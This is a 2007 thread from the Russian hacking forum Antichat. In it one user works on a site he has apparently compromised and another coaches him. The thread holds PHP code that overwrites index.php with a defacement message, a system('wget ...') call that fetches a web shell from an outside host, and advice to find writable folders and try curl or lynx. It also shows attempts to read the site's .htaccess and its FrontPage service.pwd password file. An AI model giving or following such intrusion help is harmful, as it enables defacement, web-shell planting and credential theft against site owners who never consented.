ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 19.08.2007, 18:13
Аватар для blackbarrie
blackbarrie
Новичок
Регистрация: 16.07.2007
Сообщений: 21
Провел на форуме:
158327

Репутация: 0
По умолчанию

Цитата:
Сообщение от +toxa+  
PHP код:
unlink('index.php');
$data='Hekked';
$fp=fopen('./index.php','wb');
fputs($fp,$data);
fclose($fp); 
Я делаю так
PHP код:
$data='Hekked';
$fp=fopen('./site.php','wb');
fputs($fp,$data);
fclose($fp); 
Вот что получаю...
Warning: fopen(./site.php) [function.fopen]: failed to open stream: Permission denied in http://site/hack on line 3

Warning: fputs(): supplied argument is not a valid stream resource in http://site/hack on line 4

Warning: fclose(): supplied argument is not a valid stream resource in http://site/hack on line 5
 
Ответить с цитированием

  #12  
Старый 19.08.2007, 18:13
Аватар для Basurman
Basurman
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме:
5636868

Репутация: 849
Отправить сообщение для Basurman с помощью ICQ
По умолчанию

А откуда ты его wget'ишь? у вгета 2 параметра: куда и откуда

Складируй файлы туда, куда доступ открыт. Смайлы или аватары, или хз что там еще может быть

Последний раз редактировалось Basurman; 19.08.2007 в 18:16..
 
Ответить с цитированием

  #13  
Старый 19.08.2007, 18:17
Аватар для blackbarrie
blackbarrie
Новичок
Регистрация: 16.07.2007
Сообщений: 21
Провел на форуме:
158327

Репутация: 0
По умолчанию

Теперь делаю так
PHP код:
system('wget shell.php http://site/shell.txt'); 
Всё равно ничего не заливается
 
Ответить с цитированием

  #14  
Старый 19.08.2007, 18:19
Аватар для Basurman
Basurman
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме:
5636868

Репутация: 849
Отправить сообщение для Basurman с помощью ICQ
По умолчанию

ls -la и посмотри куда доступ есть
 
Ответить с цитированием

  #15  
Старый 19.08.2007, 18:25
Аватар для blackbarrie
blackbarrie
Новичок
Регистрация: 16.07.2007
Сообщений: 21
Провел на форуме:
158327

Репутация: 0
По умолчанию

Везде стоит drwxr-xr-x или -rw-r--r--
Что должно стоять, что бы был доступ?

Добавлено
Вот полный список директории, в которой находится сайт

Код:
total 67 
drwxr-x--- 18 user nobody  1024 Feb  6 2007 . 
drwx--x--x 11 user   user  1024 Aug 11 01:59 .. 
-rw-r--r--  1 user   user   356 May 15 2006 .htaccess 
drwxr-xr-x  2 user   user  1024 Jan 25 2007 CEPF 
drwxr-xr-x  2 user   user  1024 Jan 25 2007 CEU 
-rw-r--r--  1 user   user  3862 Jan 25 2007 CFCintro2new.html 
drwxr-xr-x  3 user   user  1024 Jan 25 2007 CPFC 
drwxr-xr-x  2 user   user  1024 Jan 25 2007 Center 
drwxr-xr-x  2 user   user  1024 May 15 2006 _private 
drwxr-xr-x  4 user   user  1024 May 15 2006 _vti_bin 
drwxr-xr-x  2 user   user  1024 Jan 25 2007 _vti_cnf 
-rw-r--r--  1 user   user  1754 May 15 2006 _vti_inf.html 
drwxr-xr-x  2 user   user  1024 May 15 2006 _vti_log 
drwxr-x---  2 user nobody  1024 May 16 2006 _vti_pvt 
drwxr-xr-x  2 user   user  1024 May 15 2006 _vti_txt 
drwxr-xr-x  2 user   user  1024 May 15 2006 cgi-bin 
-rw-r--r--  1 user   user   518 Jan 30 2007 error_log 
drwxr-xr-x 10 user   user  1024 Jan 25 2007 user 
drwxr-xr-x  3 user   user  1024 Jan 25 2007 images 
-rw-r--r--  1 user   user  4216 Feb  6 2007 index.php 
-rw-r--r--  1 user   user  2700 Jan 25 2007 intro2new.html 
-rw-r--r--  1 user   user  2356 Jan 25 2007 intro3.html 
drwxr-xr-x  2 user   user  1024 Jan 25 2007 legal 
-rw-r--r--  1 user   user 22063 Jan 25 2007 menubar2.html 
-rw-r--r--  1 user   user  2447 May 15 2006 postinfo.html 
-rw-r--r--  1 user   user   312 Jan 25 2007 site_map.txt 
-rw-r--r--  1 user   user  2158 Jan 25 2007 start.html 
drwxr-xr-x  2 user   user  1024 Feb  6 2007 style 
drwxr-xr-x 10 user   user  1024 Jan 30 2007 test

Последний раз редактировалось blackbarrie; 19.08.2007 в 18:35..
 
Ответить с цитированием

  #16  
Старый 19.08.2007, 18:31
Аватар для Basurman
Basurman
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме:
5636868

Репутация: 849
Отправить сообщение для Basurman с помощью ICQ
По умолчанию

wget,get,curl,lynx,links ?

wget может быть отключен
 
Ответить с цитированием

  #17  
Старый 19.08.2007, 18:33
Аватар для blackbarrie
blackbarrie
Новичок
Регистрация: 16.07.2007
Сообщений: 21
Провел на форуме:
158327

Репутация: 0
По умолчанию

phpinfo() говорит о том что cURL включён.
Как закачать файл через get,curl,lynx,links или где мне об этом можно почитать?
 
Ответить с цитированием

  #18  
Старый 19.08.2007, 18:42
Аватар для Basurman
Basurman
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме:
5636868

Репутация: 849
Отправить сообщение для Basurman с помощью ICQ
По умолчанию

http://php.fud.ru/ там curl поищи.
lynx это бровсер

drwx--x--x 11 user user 1024 Aug 11 01:59 ..

Есть там еще .htaccess - должно быть интересно внутри

Последний раз редактировалось Basurman; 19.08.2007 в 18:45..
 
Ответить с цитированием

  #19  
Старый 19.08.2007, 18:51
Аватар для blackbarrie
blackbarrie
Новичок
Регистрация: 16.07.2007
Сообщений: 21
Провел на форуме:
158327

Репутация: 0
По умолчанию

Вот содержимое .htaccess
Код:
# -FrontPage- IndexIgnore .htaccess */.??* *~ *# */HEADER* */README* */_vti* order deny,allow deny from all allow from all order deny,allow deny from all AuthName www.site.org AuthUserFile /home/user/public_html/_vti_pvt/service.pwd AuthGroupFile /home/user/public_html/_vti_pvt/service.grp
 
Ответить с цитированием

  #20  
Старый 19.08.2007, 18:56
Аватар для blackbarrie
blackbarrie
Новичок
Регистрация: 16.07.2007
Сообщений: 21
Провел на форуме:
158327

Репутация: 0
По умолчанию

При попытке прочитать service.pwd получаю
Код:
Warning: readfile() [function.readfile]: open_basedir restriction in effect. File(/home/user/public_html/_vti_pvt/service.pwd) is not within the allowed path(s): (/home/user/:/usr/lib/php:/usr/local/lib/php:/tmp) in http://mysite/shell on line 16

Warning: readfile(/home/user/public_html/_vti_pvt/service.pwd) [function.readfile]: failed to open stream: Operation not permitted in http://mysite/shell on line 16
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Продаю самые Красивые номера. Красивые 5,6 знаки. Кирпич ICQ - Покупка, продажа 3 09.04.2004 18:45



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ